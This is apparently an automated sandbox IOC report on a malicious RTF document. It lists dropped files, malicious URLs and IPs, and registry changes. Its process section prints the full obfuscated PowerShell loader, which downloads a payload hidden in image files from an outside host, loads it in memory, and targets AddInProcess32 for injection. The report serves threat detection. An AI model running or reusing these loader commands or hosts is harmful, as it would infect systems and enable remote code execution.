IOC Report
yDOZ8nTvm8.rtf

loading gif

Files

File Path
Type
Category
Malicious
yDOZ8nTvm8.rtf
Rich Text Format data, version 1
initial sample
 malicious
C:\Users\user\AppData\Roaming\kissingcakewithgoodway.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\breadinbakery[1].jpg
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IZzaN[1].txt
Unicode text, UTF-8 text, with very long lines (11104), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7E7C28E0-CDB6-43EC-9DCF-2D14D81851F4}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4D2A3050-E6F4-4B00-A912-364DD9C82CF1}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{83C8C4D9-F237-4B1B-A702-00054280F9EC}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bb0z5wbl.qwy.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\chz4tvmj.iy4.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\pwecqqsg.er1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\s5ahgpt1.ysu.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\yDOZ8nTvm8.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Thu Apr 18 03:59:54 2024, length=72316, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$OZ8nTvm8.rtf
data
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kissingcakewithgoodway.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgDgTre0DgTreDYDgTreZQBzDgTreGEDgTreYgBlDgTreGMDgTreZQBlDgTreHIDgTreZwB5DgTreGwDgTrebgBvDgTreGUDgTreYwBlDgTreGUDgTrecgBnDgTreHIDgTrebwBmDgTreC8DgTreMQDgTre1DgTreDEDgTreLgDgTre2DgTreDEDgTreMgDgTreuDgTreDMDgTreLgDgTreyDgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.46esabeceergylnoeceergrof/151.612.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious

URLs

Name
IP
Malicious
http://192.3.216.151/breadinbakery.jpeg
192.3.216.151
 malicious
http://192.3.216.151/forgreeceonlygreecebase64.txt
192.3.216.151
 malicious
https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500
104.21.45.138
 malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469
104.21.45.138
 malicious
http://nuget.org/NuGet.exe
unknown
https://account.dyn.com/
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://paste.ee/d/IZzaN
104.21.84.67
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/s
unknown
https://www.google.com
unknown
http://192.3.216.151
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://lesferch.github.io/DesktopPic
unknown
http://192.3.216.151/breadinbakery.jpegrrC:
unknown
http://crl.micro
unknown
https://paste.ee/d/IZzaNgq
unknown
http://192.3.216.151/breadinbakery.jpegj
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
https://paste.ee/d/IZzaNek
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 31 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uploaddeimagens.com.br
104.21.45.138
 malicious
paste.ee
172.67.187.200
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
104.21.45.138
uploaddeimagens.com.br
United States
malicious
192.3.216.151
unknown
United States
malicious
104.21.84.67
unknown
United States
malicious
208.95.112.1
ip-api.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
<%)
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
c&)
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
y()
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\289B9
289B9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
